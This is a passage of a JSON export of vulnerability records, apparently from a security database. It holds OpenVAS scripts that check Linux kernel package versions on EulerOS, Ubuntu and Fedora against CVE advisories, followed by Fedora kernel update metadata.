isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if 
(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2018-9363", "CVE-2016-9588", "CVE-2018-16658", "CVE-2017-13168"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310843824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843824", "type": "openvas", "title": "Ubuntu Update for linux USN-3822-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3822_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux USN-3822-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843824\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2016-9588\", \"CVE-2017-13168\", \"CVE-2017-16649\", \"CVE-2018-16658\", \"CVE-2018-9363\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-15 06:00:08 +0100 (Thu, 15 Nov 2018)\");\n script_name(\"Ubuntu Update for linux USN-3822-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3822-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3822-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-3822-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Jim Mattson discovered that the KVM implementation in the Linux kernel\nmismanages the #BP and #OF exceptions. 
A local attacker in a guest virtual\nmachine could use this to cause a denial of service (guest OS crash).\n(CVE-2016-9588)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not\nproperly enforce permissions on kernel memory access. A local attacker\ncould use this to expose sensitive information or possibly elevate\nprivileges. (CVE-2017-13168)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of\nthe Linux kernel. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth\nimplementation in the Linux kernel that could lead to a buffer overwrite.\nAn attacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. 
(CVE-2018-9363)\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-generic\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-generic-lpae\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-lowlatency\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc-e500\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc-e500mc\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc-smp\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc64-emb\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-162-powerpc64-smp\", ver:\"3.13.0-162.212\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.162.172\", 
rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.162.172\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10021", "CVE-2018-8043", "CVE-2017-17863", "CVE-2017-17450", "CVE-2018-1108", "CVE-2017-17558", "CVE-2018-1000004", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-12193", "CVE-2017-17862", "CVE-2017-17852", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-17854", "CVE-2017-17853", "CVE-2018-7757", "CVE-2017-15115", "CVE-2017-17712", "CVE-2017-8824", "CVE-2017-17448", "CVE-2018-1065", "CVE-2017-18232", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2018-7995", "CVE-2018-5750", 
"CVE-2017-16538", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-16644", "CVE-2017-17864", "CVE-2018-5803", "CVE-2017-1000405", "CVE-2018-1000026", "CVE-2017-17856"], "description": "The remote host is missing an update for the 'kernel' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2018-05-02T00:00:00", "id": "OPENVAS:1361412562310874400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874400", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2018-e71875c4aa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_e71875c4aa_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-e71875c4aa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874400\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-02 16:59:02 +0530 (Wed, 02 May 2018)\");\n script_cve_id(\"CVE-2018-10021\", \"CVE-2017-18232\", \"CVE-2018-7995\", \"CVE-2018-8043\",\n \"CVE-2018-7757\", \"CVE-2018-5803\", \"CVE-2018-1065\", \"CVE-2018-1000026\",\n \"CVE-2018-5750\", \"CVE-2018-1000004\", \"CVE-2018-5344\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2017-17862\", \"CVE-2017-17863\", \"CVE-2017-17864\",\n \"CVE-2017-17852\", \"CVE-2017-17853\", \"CVE-2017-17854\", \"CVE-2017-17855\",\n \"CVE-2017-17856\", \"CVE-2017-17857\", \"CVE-2017-17741\", \"CVE-2017-17712\",\n \"CVE-2017-17449\", \"CVE-2017-17450\", \"CVE-2017-17448\", \"CVE-2017-17558\",\n \"CVE-2017-8824\", \"CVE-2017-1000405\", \"CVE-2017-16649\", \"CVE-2017-16650\",\n \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-15115\", \"CVE-2017-16532\",\n \"CVE-2017-16538\", \"CVE-2017-12193\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-e71875c4aa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n 
script_tag(name:\"affected\", value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-e71875c4aa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/23BZYWCPCFYSPRRRVNCK6UFYCODGX6GB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.16.4~200.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10021", "CVE-2018-8043", "CVE-2017-17863", "CVE-2017-17450", "CVE-2017-17558", "CVE-2018-1000004", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-12193", "CVE-2017-17862", "CVE-2017-17852", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-17854", "CVE-2017-17853", "CVE-2018-7757", "CVE-2017-15115", "CVE-2017-17712", "CVE-2017-8824", "CVE-2017-17448", "CVE-2018-1065", "CVE-2017-18232", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2018-7995", "CVE-2018-5750", "CVE-2017-16538", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-16644", "CVE-2017-17864", "CVE-2018-5803", "CVE-2017-1000405", "CVE-2018-1000026", "CVE-2017-17856"], "description": "The remote host is missing an update 
for the 'kernel' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310874366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874366", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2018-1e033dc308", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1e033dc308_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-1e033dc308\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874366\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 08:57:51 +0200 (Wed, 18 Apr 2018)\");\n script_cve_id(\"CVE-2018-10021\", \"CVE-2017-18232\", \"CVE-2018-7995\", \"CVE-2018-8043\",\n \"CVE-2018-7757\", \"CVE-2018-5803\", \"CVE-2018-1065\", \"CVE-2018-1000026\",\n \"CVE-2018-5750\", \"CVE-2018-1000004\", \"CVE-2018-5344\", \"CVE-2018-5332\",\n \"CVE-2018-5333\", \"CVE-2017-17862\", \"CVE-2017-17863\", \"CVE-2017-17864\",\n \"CVE-2017-17852\", \"CVE-2017-17853\", \"CVE-2017-17854\", \"CVE-2017-17855\",\n \"CVE-2017-17856\", \"CVE-2017-17857\", \"CVE-2017-17741\", \"CVE-2017-17712\",\n \"CVE-2017-17449\", \"CVE-2017-17450\", \"CVE-2017-17448\", \"CVE-2017-17558\",\n \"CVE-2017-8824\", \"CVE-2017-1000405\", \"CVE-2017-16649\", \"CVE-2017-16650\",\n \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-15115\", \"CVE-2017-16532\",\n \"CVE-2017-16538\", \"CVE-2017-12193\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-1e033dc308\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", 
value:\"kernel on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1e033dc308\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SKS5SHENFBKZBNJZ5A6BMP6JNTK5D4QC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.15.17~300.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16994"], "description": "The kernel meta package ", "modified": "2017-12-01T09:06:53", "published": "2017-12-01T09:06:53", "id": "FEDORA:1CF5E61A25A8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.13.16-300.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16994"], "description": "The kernel meta package ", "modified": "2017-12-01T03:45:23", "published": "2017-12-01T03:45:23", "id": "FEDORA:1EFCC607D641", "href": "", "type": "fedora", "title": "[SECURITY] 
Fedora 26 Update: kernel-4.13.16-200.fc26", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-16994"], "description": "The kernel meta package ", "modified": "2017-12-02T08:03:57", "published": "2017-12-02T08:03:57", "id": "FEDORA:D668A604CC02", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.13.16-100.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-1065", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-04-18T01:31:51", "published": "2018-04-18T01:31:51", "id": "FEDORA:74245604D4DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.15.17-300.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", 
"CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-1065", "CVE-2018-1108", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-04-29T05:16:13", "published": "2018-04-29T05:16:13", "id": "FEDORA:AB52460321C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.4-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-05-25T15:46:24", "published": "2018-05-25T15:46:24", "id": "FEDORA:08D3760E6566", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.11-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", 
"CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-06-05T14:11:50", "published": "2018-06-05T14:11:50", "id": "FEDORA:4832F6079717", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.13-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-10853", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-06-17T19:45:35", "published": "2018-06-17T19:45:35", "id": "FEDORA:DF5176048167", 
"href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.15-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18232", "CVE-2017-8824", "CVE-2018-1000004", "CVE-2018-1000026", "CVE-2018-10021", "CVE-2018-10322", "CVE-2018-10323", "CVE-2018-1065", "CVE-2018-10840", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-3639", "CVE-2018-5332", "CVE-2018-5333", "CVE-2018-5344", "CVE-2018-5750", "CVE-2018-5803", "CVE-2018-7757", "CVE-2018-7995", "CVE-2018-8043"], "description": "The kernel meta package ", "modified": "2018-05-29T11:50:44", "published": "2018-05-29T11:50:44", "id": "FEDORA:E6F08605DCE7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.16.12-200.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405", "CVE-2017-12193", "CVE-2017-15115", "CVE-2017-16532", "CVE-2017-16538", "CVE-2017-16644", "CVE-2017-16647", "CVE-2017-16649", "CVE-2017-16650", 